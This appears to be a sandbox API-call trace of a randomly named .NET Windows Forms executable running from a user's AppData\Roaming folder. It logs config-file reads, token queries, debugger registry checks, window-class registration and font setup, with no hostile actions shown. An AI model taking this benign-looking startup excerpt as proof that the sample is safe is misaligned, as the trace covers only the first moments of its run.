[0274.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x16e2dc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43
[0274.111] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16e51c) returned 1
[0274.112] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x16e7e0 | out: lpFileInformation=0x16e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1
[0274.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16e518) returned 1
[0274.222] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x16e6ac | out: pfEnabled=0x16e6ac) returned 0x0
[0274.299] GetFileSize (in: hFile=0x40, lpFileSizeHigh=0x16effc | out: lpFileSizeHigh=0x16effc*=0x0) returned 0x8c8e
[0274.300] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16efb8, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16efb8*=0x1000, lpOverlapped=0x0) returned 1
[0274.319] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ee68, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ee68*=0x1000, lpOverlapped=0x0) returned 1
[0274.322] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ed1c, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ed1c*=0x1000, lpOverlapped=0x0) returned 1
[0274.323] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ed1c, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ed1c*=0x1000, lpOverlapped=0x0) returned 1
[0274.324] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ed1c, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ed1c*=0x1000, lpOverlapped=0x0) returned 1
[0274.325] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ec54, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ec54*=0x1000, lpOverlapped=0x0) returned 1
[0274.332] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16edc0, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16edc0*=0x1000, lpOverlapped=0x0) returned 1
[0274.334] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ecb4, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ecb4*=0x1000, lpOverlapped=0x0) returned 1
[0274.335] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ecb4, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ecb4*=0xc8e, lpOverlapped=0x0) returned 1
[0274.335] ReadFile (in: hFile=0x40, lpBuffer=0x23bfff8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16ed78, lpOverlapped=0x0 | out: lpBuffer=0x23bfff8*, lpNumberOfBytesRead=0x16ed78*=0x0, lpOverlapped=0x0) returned 1
[0274.335] CloseHandle (hObject=0x40) returned 1
[0274.336] CloseHandle (hObject=0x1f0) returned 1
[0274.337] GetCurrentProcess () returned 0xffffffff
[0274.337] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16f154 | out: TokenHandle=0x16f154*=0x1f0) returned 1
[0274.338] CloseHandle (hObject=0x1f0) returned 1
[0274.338] GetCurrentProcess () returned 0xffffffff
[0274.338] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16f154 | out: TokenHandle=0x16f154*=0x1f0) returned 1
[0274.339] CloseHandle (hObject=0x1f0) returned 1
[0274.348] GetCurrentProcess () returned 0xffffffff
[0274.348] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16f008 | out: TokenHandle=0x16f008*=0x1f0) returned 1
[0274.348] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x16f000 | out: lpFileInformation=0x16f000*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0274.349] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config", nBufferLength=0x105, lpBuffer=0x16ea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config", lpFilePart=0x0) returned 0x3a
[0274.349] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe.config" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\nfxioujoilco.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x16f008 | out: lpFileInformation=0x16f008*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0274.349] CloseHandle (hObject=0x1f0) returned 1
[0274.350] GetCurrentProcess () returned 0xffffffff
[0274.350] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16f154 | out: TokenHandle=0x16f154*=0x1f0) returned 1
[0274.350] CloseHandle (hObject=0x1f0) returned 1
[0274.352] GetCurrentProcess () returned 0xffffffff
[0274.352] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16f154 | out: TokenHandle=0x16f154*=0x1f0) returned 1
[0274.353] CloseHandle (hObject=0x1f0) returned 1
[0274.389] GetCurrentProcess () returned 0xffffffff
[0274.389] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16ef6c | out: TokenHandle=0x16ef6c*=0x1f0) returned 1
[0274.396] CloseHandle (hObject=0x1f0) returned 1
[0274.397] GetCurrentProcess () returned 0xffffffff
[0274.397] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x16ef84 | out: TokenHandle=0x16ef84*=0x1f0) returned 1
[0274.406] CloseHandle (hObject=0x1f0) returned 1
[0274.411] GetSystemMetrics (nIndex=75) returned 1
[0274.419] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0
[0274.428] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b80000
[0274.434] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AddDllDirectory", cchWideChar=15, lpMultiByteStr=0x16f250, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AddDllDirectory", lpUsedDefaultChar=0x0) returned 15
[0274.434] GetProcAddress (hModule=0x76b80000, lpProcName="AddDllDirectory") returned 0x75171e91
[0274.435] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x800) returned 0x74170000
[0274.459] AdjustWindowRectEx (in: lpRect=0x16f3b8, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x16f3b8) returned 1
[0274.465] GetCurrentProcess () returned 0xffffffff
[0274.465] GetCurrentThread () returned 0xfffffffe
[0274.466] GetCurrentProcess () returned 0xffffffff
[0274.466] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x16f2d0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x16f2d0*=0x40) returned 1
[0274.471] GetCurrentThreadId () returned 0x534
[0274.487] GetCurrentActCtx (in: lphActCtx=0x16f230 | out: lphActCtx=0x16f230*=0x0) returned 1
[0274.487] ActivateActCtx (in: hActCtx=0x70614c, lpCookie=0x16f240 | out: hActCtx=0x70614c, lpCookie=0x16f240) returned 1
[0274.490] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76c90000
[0274.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x16f0e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWçp©\x8b²\x93Dþ\x80tÄõ\x16", lpUsedDefaultChar=0x0) returned 14
[0274.490] GetProcAddress (hModule=0x76c90000, lpProcName="DefWindowProcW") returned 0x774c25dd
[0274.491] GetStockObject (i=5) returned 0x1900015
[0274.498] GetModuleHandleW (lpModuleName=0x0) returned 0xec0000
[0274.501] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0274.501] RegisterClassW (lpWndClass=0x16f0d8) returned 0xc107
[0274.501] CoTaskMemFree (pv=0x722330)
[0274.501] GetModuleHandleW (lpModuleName=0x0) returned 0xec0000
[0274.502] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0xec0000, lpParam=0x0) returned 0x1015e
[0274.503] SetWindowLongW (hWnd=0x1015e, nIndex=-4, dwNewLong=2001479133) returned 71436502
[0274.504] GetWindowLongW (hWnd=0x1015e, nIndex=-4) returned 2001479133
[0274.514] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x16e9ec | out: phkResult=0x16e9ec*=0x230) returned 0x0
[0274.516] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x16ea0c, lpData=0x0, lpcbData=0x16ea08*=0x0 | out: lpType=0x16ea0c*=0x0, lpData=0x0, lpcbData=0x16ea08*=0x0) returned 0x2
[0274.516] RegQueryValueExW (in: hKey=0x230, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x16ea0c, lpData=0x0, lpcbData=0x16ea08*=0x0 | out: lpType=0x16ea0c*=0x0, lpData=0x0, lpcbData=0x16ea08*=0x0) returned 0x2
[0274.516] RegCloseKey (hKey=0x230) returned 0x0
[0274.518] SetWindowLongW (hWnd=0x1015e, nIndex=-4, dwNewLong=71436542) returned 2001479133
[0274.518] GetWindowLongW (hWnd=0x1015e, nIndex=-4) returned 71436542
[0274.518] GetWindowLongW (hWnd=0x1015e, nIndex=-16) returned 113311744
[0274.520] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc108
[0274.521] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x1015e, Msg=0x24, wParam=0x0, lParam=0x16ecc4) returned 0x0
[0274.521] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc109
[0274.521] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x1015e, Msg=0x81, wParam=0x0, lParam=0x16ecb8) returned 0x1
[0274.521] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x1015e, Msg=0x83, wParam=0x0, lParam=0x16eca4) returned 0x0
[0274.522] CallWindowProcW (lpPrevWndFunc=0x774c25dd, hWnd=0x1015e, Msg=0x1, wParam=0x0, lParam=0x16ecb8) returned 0x0
[0274.522] GetClientRect (in: hWnd=0x1015e, lpRect=0x16ea20 | out: lpRect=0x16ea20) returned 1
[0274.523] GetWindowRect (in: hWnd=0x1015e, lpRect=0x16ea20 | out: lpRect=0x16ea20) returned 1
[0274.524] GetParent (hWnd=0x1015e) returned 0x0
[0274.525] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1c110001) returned 1
[0274.722] AdjustWindowRectEx (in: lpRect=0x16f168, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f168) returned 1
[0274.723] AdjustWindowRectEx (in: lpRect=0x16f178, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f178) returned 1
[0274.723] AdjustWindowRectEx (in: lpRect=0x16f178, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f178) returned 1
[0274.724] AdjustWindowRectEx (in: lpRect=0x16f178, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f178) returned 1
[0274.725] AdjustWindowRectEx (in: lpRect=0x16f178, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f178) returned 1
[0274.725] AdjustWindowRectEx (in: lpRect=0x16f178, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f178) returned 1
[0274.726] AdjustWindowRectEx (in: lpRect=0x16f168, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f168) returned 1
[0274.731] AdjustWindowRectEx (in: lpRect=0x16f17c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f17c) returned 1
[0274.732] AdjustWindowRectEx (in: lpRect=0x16f17c, dwStyle=0x5601008d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f17c) returned 1
[0274.733] AdjustWindowRectEx (in: lpRect=0x16f168, dwStyle=0x56010000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f168) returned 1
[0274.737] GetCurrentThreadId () returned 0x534
[0274.737] GetCurrentThreadId () returned 0x534
[0274.741] GetSystemDefaultLCID () returned 0x409
[0274.742] GetStockObject (i=17) returned 0x18a0025
[0274.744] GetObjectW (in: h=0x18a0025, c=92, pv=0x16efcc | out: pv=0x16efcc) returned 92
[0274.745] GetDC (hWnd=0x0) returned 0x150107bd
[0274.755] GdiplusStartup (in: token=0x266018, input=0x16e590, output=0x16e5e0 | out: token=0x266018, output=0x16e5e0) returned 0x0
[0274.768] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0274.768] GdipCreateFontFromLogfontW (hdc=0x150107bd, logfont=0x722330, font=0x16f094) returned 0x0
[0274.891] CoTaskMemFree (pv=0x722330)
[0274.892] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0274.892] CoTaskMemFree (pv=0x722330)
[0274.892] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0274.893] CoTaskMemFree (pv=0x722330)
[0274.893] GdipGetFontUnit (font=0x572230, unit=0x16f05c) returned 0x0
[0274.893] GdipGetFontSize (font=0x572230, size=0x16f060) returned 0x0
[0274.894] GdipGetFontStyle (font=0x572230, style=0x16f058) returned 0x0
[0274.894] GdipGetFamily (font=0x572230, family=0x16f054) returned 0x0
[0274.895] GdipGetFontSize (font=0x572230, size=0x23ddd28) returned 0x0
[0274.895] ReleaseDC (hWnd=0x0, hDC=0x150107bd) returned 1
[0274.896] GetDC (hWnd=0x0) returned 0x70101c6
[0274.896] GdipCreateFromHDC (hdc=0x70101c6, graphics=0x16f070) returned 0x0
[0274.898] GdipGetDpiY (graphics=0x5079170, dpi=0x23dde04) returned 0x0
[0274.898] GdipGetFontHeight (font=0x572230, graphics=0x5079170, height=0x16f068) returned 0x0
[0274.898] GdipGetEmHeight (family=0x57f358, style=0, EmHeight=0x16f070) returned 0x0
[0274.899] GdipGetLineSpacing (family=0x57f358, style=0, LineSpacing=0x16f070) returned 0x0
[0274.911] GdipDeleteGraphics (graphics=0x5079170) returned 0x0
[0274.912] ReleaseDC (hWnd=0x0, hDC=0x70101c6) returned 1
[0274.914] GdipCreateFont (fontFamily=0x57f358, emSize=0x41040000, style=0, unit=0x3, font=0x23dde20) returned 0x0
[0274.914] GdipGetFontSize (font=0x4ff0960, size=0x23dde24) returned 0x0
[0274.914] GdipDeleteFont (font=0x572230) returned 0x0
[0274.917] GetCurrentThreadId () returned 0x534
[0274.917] GetCurrentThreadId () returned 0x534
[0274.917] GetCurrentThreadId () returned 0x534
[0274.917] GetCurrentThreadId () returned 0x534
[0274.918] GetCurrentThreadId () returned 0x534
[0274.918] GetCurrentThreadId () returned 0x534
[0274.918] GetCurrentThreadId () returned 0x534
[0274.918] GetCurrentThreadId () returned 0x534
[0274.918] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f108) returned 1
[0274.925] GetProcessWindowStation () returned 0x60
[0274.927] GetUserObjectInformationA (in: hObj=0x60, nIndex=1, pvInfo=0x23de6d8, nLength=0xc, lpnLengthNeeded=0x16efe4 | out: pvInfo=0x23de6d8, lpnLengthNeeded=0x16efe4) returned 1
[0274.930] SetConsoleCtrlHandler (HandlerRoutine=0x4420926, Add=1) returned 1
[0274.931] GetModuleHandleW (lpModuleName=0x0) returned 0xec0000
[0274.931] GetModuleHandleW (lpModuleName=0x0) returned 0xec0000
[0274.934] GetClassInfoW (in: hInstance=0xec0000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x23de73c | out: lpWndClass=0x23de73c) returned 0
[0274.936] CoTaskMemAlloc (cb=0x58) returned 0x7095f0
[0274.936] RegisterClassW (lpWndClass=0x16ef34) returned 0xc10b
[0274.936] CoTaskMemFree (pv=0x7095f0)
[0274.937] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0xec0000, lpParam=0x0) returned 0x10162
[0274.938] NtdllDefWindowProc_W () returned 0x1
[0274.939] NtdllDefWindowProc_W () returned 0x0
[0274.939] NtdllDefWindowProc_W () returned 0x0
[0274.939] NtdllDefWindowProc_W () returned 0x0
[0274.939] NtdllDefWindowProc_W () returned 0x0
[0274.942] GetSysColor (nIndex=10) returned 0xb4b4b4
[0274.942] GetSysColor (nIndex=2) returned 0xd1b499
[0274.942] GetSysColor (nIndex=9) returned 0x0
[0274.942] GetSysColor (nIndex=12) returned 0xababab
[0274.942] GetSysColor (nIndex=15) returned 0xf0f0f0
[0274.942] GetSysColor (nIndex=20) returned 0xffffff
[0274.942] GetSysColor (nIndex=16) returned 0xa0a0a0
[0274.942] GetSysColor (nIndex=15) returned 0xf0f0f0
[0274.942] GetSysColor (nIndex=16) returned 0xa0a0a0
[0274.942] GetSysColor (nIndex=21) returned 0x696969
[0274.942] GetSysColor (nIndex=22) returned 0xe3e3e3
[0274.942] GetSysColor (nIndex=20) returned 0xffffff
[0274.942] GetSysColor (nIndex=18) returned 0x0
[0274.942] GetSysColor (nIndex=1) returned 0x0
[0274.942] GetSysColor (nIndex=27) returned 0xead1b9
[0274.942] GetSysColor (nIndex=28) returned 0xf2e4d7
[0274.942] GetSysColor (nIndex=17) returned 0x6d6d6d
[0274.942] GetSysColor (nIndex=13) returned 0xff9933
[0274.942] GetSysColor (nIndex=14) returned 0xffffff
[0274.942] GetSysColor (nIndex=26) returned 0xcc6600
[0274.942] GetSysColor (nIndex=11) returned 0xfcf7f4
[0274.942] GetSysColor (nIndex=3) returned 0xdbcdbf
[0274.943] GetSysColor (nIndex=19) returned 0x544e43
[0274.943] GetSysColor (nIndex=24) returned 0xe1ffff
[0274.943] GetSysColor (nIndex=23) returned 0x0
[0274.943] GetSysColor (nIndex=4) returned 0xf0f0f0
[0274.943] GetSysColor (nIndex=30) returned 0xf0f0f0
[0274.943] GetSysColor (nIndex=29) returned 0xff9933
[0274.943] GetSysColor (nIndex=7) returned 0x0
[0274.943] GetSysColor (nIndex=0) returned 0xc8c8c8
[0274.943] GetSysColor (nIndex=5) returned 0xffffff
[0274.943] GetSysColor (nIndex=6) returned 0x646464
[0274.943] GetSysColor (nIndex=8) returned 0x0
[0274.943] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f108) returned 1
[0274.944] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.944] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.946] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x5601000b, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f108) returned 1
[0274.947] GetCurrentThreadId () returned 0x534
[0274.947] GetCurrentThreadId () returned 0x534
[0274.947] GetCurrentThreadId () returned 0x534
[0274.947] GetCurrentThreadId () returned 0x534
[0274.947] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f108) returned 1
[0274.947] AdjustWindowRectEx (in: lpRect=0x16f108, dwStyle=0x56000000, bMenu=0, dwExStyle=0x10000 | out: lpRect=0x16f108) returned 1
[0274.948] AdjustWindowRectEx (in: lpRect=0x16efb8, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16efb8) returned 1
[0274.950] GdipGetFamilyName (in: family=0x57f358, name=0x16ef80, language=0x409 | out: name="Microsoft Sans Serif") returned 0x0
[0274.951] CreateCompatibleDC (hdc=0x0) returned 0x1001020d
[0274.953] GetCurrentObject (hdc=0x1001020d, type=0x1) returned 0x1b00017
[0274.953] GetCurrentObject (hdc=0x1001020d, type=0x2) returned 0x1900010
[0274.953] GetCurrentObject (hdc=0x1001020d, type=0x7) returned 0x185000f
[0274.953] GetCurrentObject (hdc=0x1001020d, type=0x6) returned 0x18a002e
[0274.955] SaveDC (hdc=0x1001020d) returned 1
[0274.955] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0274.957] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0274.957] CreateFontIndirectW (lplf=0x722330) returned 0x80a020b
[0274.957] CoTaskMemFree (pv=0x722330)
[0274.958] GetObjectW (in: h=0x80a020b, c=92, pv=0x16ef44 | out: pv=0x16ef44) returned 92
[0274.959] GetCurrentObject (hdc=0x1001020d, type=0x6) returned 0x18a002e
[0274.959] GetObjectW (in: h=0x18a002e, c=92, pv=0x16ef34 | out: pv=0x16ef34) returned 92
[0274.960] SelectObject (hdc=0x1001020d, h=0x80a020b) returned 0x18a002e
[0274.960] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23df8b4 | out: psizl=0x23df8b4) returned 1
[0274.964] AdjustWindowRectEx (in: lpRect=0x16f090, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f090) returned 1
[0274.966] GdipCreateFontFamilyFromName (name="Arial", fontCollection=0x0, fontFamily=0x16f158) returned 0x0
[0274.966] GdipCreateFont (fontFamily=0x4fab598, emSize=0x417c0000, style=1, unit=0x3, font=0x23df9a8) returned 0x0
[0275.007] GdipGetFontSize (font=0x572230, size=0x23df9ac) returned 0x0
[0275.008] AdjustWindowRectEx (in: lpRect=0x16ef70, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ef70) returned 1
[0275.017] GdipGetFamilyName (in: family=0x4fab598, name=0x16ef38, language=0x409 | out: name="Arial") returned 0x0
[0275.018] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.018] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.018] CreateFontIndirectW (lplf=0x722330) returned 0x50a0208
[0275.019] CoTaskMemFree (pv=0x722330)
[0275.019] GetObjectW (in: h=0x50a0208, c=92, pv=0x16eefc | out: pv=0x16eefc) returned 92
[0275.019] SelectObject (hdc=0x1001020d, h=0x50a0208) returned 0x80a020b
[0275.020] DeleteObject (ho=0x80a020b) returned 1
[0275.020] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23dfc5c | out: psizl=0x23dfc5c) returned 1
[0275.022] AdjustWindowRectEx (in: lpRect=0x16f048, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f048) returned 1
[0275.022] AdjustWindowRectEx (in: lpRect=0x16efa4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16efa4) returned 1
[0275.022] GdipGetFamilyName (in: family=0x4fab598, name=0x16ef6c, language=0x409 | out: name="Arial") returned 0x0
[0275.022] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.022] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.022] CreateFontIndirectW (lplf=0x722330) returned 0x90a020b
[0275.022] CoTaskMemFree (pv=0x722330)
[0275.022] GetObjectW (in: h=0x90a020b, c=92, pv=0x16ef30 | out: pv=0x16ef30) returned 92
[0275.023] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23dfe54 | out: psizl=0x23dfe54) returned 1
[0275.023] DeleteObject (ho=0x90a020b) returned 1
[0275.023] AdjustWindowRectEx (in: lpRect=0x16f0dc, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16f0dc) returned 1
[0275.024] AdjustWindowRectEx (in: lpRect=0x16efa4, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16efa4) returned 1
[0275.024] GdipGetFamilyName (in: family=0x4fab598, name=0x16ef6c, language=0x409 | out: name="Arial") returned 0x0
[0275.026] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.027] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.027] CreateFontIndirectW (lplf=0x722330) returned 0xa0a020b
[0275.027] CoTaskMemFree (pv=0x722330)
[0275.027] GetObjectW (in: h=0xa0a020b, c=92, pv=0x16ef30 | out: pv=0x16ef30) returned 92
[0275.027] GetTextExtentPoint32W (in: hdc=0x1001020d, lpString="0", c=1, psizl=0x23e0054 | out: psizl=0x23e0054) returned 1
[0275.027] DeleteObject (ho=0xa0a020b) returned 1
[0275.027] AdjustWindowRectEx (in: lpRect=0x16ef7c, dwStyle=0x5600000d, bMenu=0, dwExStyle=0x0 | out: lpRect=0x16ef7c) returned 1
[0275.034] GdipGetFamilyName (in: family=0x4fab598, name=0x16ee68, language=0x409 | out: name="Arial") returned 0x0
[0275.034] GetDeviceCaps (hdc=0x1001020d, index=90) returned 96
[0275.034] CoTaskMemAlloc (cb=0x5c) returned 0x722330
[0275.035] CreateFontIndirectW (lplf=0x722330) returned 0xb0a020b
[0275.035] CoTaskMemFree (pv=0x722330)
[0275.035] GetObjectW (in: h=0xb0a020b, c=92, pv=0x16ee2c | out: pv=0x16ee2c) returned 92
